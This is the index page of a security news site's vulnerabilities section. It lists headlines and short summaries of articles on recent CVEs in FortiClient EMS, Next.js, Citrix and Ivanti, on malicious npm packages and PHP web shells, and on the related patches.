Coverage
Vulnerabilities
748 articles on vulnerability disclosures and exploits
Advertisement
FortiClient EMS RCE via CVE-2026-35616 — Mitigation Guide
Fortinet releases emergency patches for CVE-2026-35616, a critical SQL injection flaw in FortiClient EMS exploited to achieve unauthenticated RCE.
CVE-2025-55182: Hackers Exploit React2Shell in Next.js Applications
Security researchers observe automated credential theft campaigns exploiting the React2Shell vulnerability (CVE-2025-55182) in vulnerable Next.js frameworks.
CVE-2026-35616: Critical FortiClient EMS API Bypass Exploited
Fortinet releases out-of-band patches for CVE-2026-35616, a critical API access bypass in FortiClient EMS enabling unauthenticated privilege escalation.
36 Malicious npm Packages Target Strapi, Redis, and PostgreSQL
36 malicious npm packages disguised as Strapi CMS plugins target Redis and PostgreSQL environments to deploy persistent implants and reverse shells.
Community-Driven Intel: Managing Unstructured Vulnerability Data
Examine how security practitioners use open intelligence forums to identify emerging threats and the technical challenges of processing unstructured data.
Apple Patches DarkSword for iOS 18 — Security Analysis
Apple breaks precedent by patching the DarkSword mobile exploitation framework for iOS 18, addressing critical kernel-level risks and RCE vulnerabilities.
Cookie-Controlled PHP Web Shells Evade Detection on Linux Servers
Microsoft researchers warn of stealthy PHP web shells on Linux using HTTP cookies for command execution and cron jobs for long-term persistence.
TrueConf Zero-Day: Exploitation Against Asian Governments
A Chinese threat actor is actively exploiting a TrueConf video conferencing zero-day to conduct reconnaissance and achieve privilege escalation against Asian government
Shadow AI & Zero-Click Exploits Expand Enterprise Mobile Attack Surface
Enterprises face a growing mobile attack surface from shadow AI in apps, outdated devices, and zero-click exploits, leading to unseen risks for corporate data.
CVE-2023-24489: Citrix ShareFile StorageZones Controller Unauthenticated RCE
Critical unauthenticated RCE in Citrix ShareFile StorageZones Controller (CVE-2023-24489) enables arbitrary file upload and full system compromise. Patch immediately.
Ivanti Connect Secure RCE: Internal Network Vulnerability Detection
Analyze the impact of Ivanti Connect Secure vulnerabilities and learn how to conduct internal network vulnerability scanning for Ivanti appliances to detect flaws.
Yokogawa CENTUM VP CVE-2025-7741 Hardcoded Password Patch Guidance
CISA identifies a hardcoded password in Yokogawa CENTUM VP (CVE-2025-7741). Learn how to secure the PROG account and apply the R7.01.10 patch now.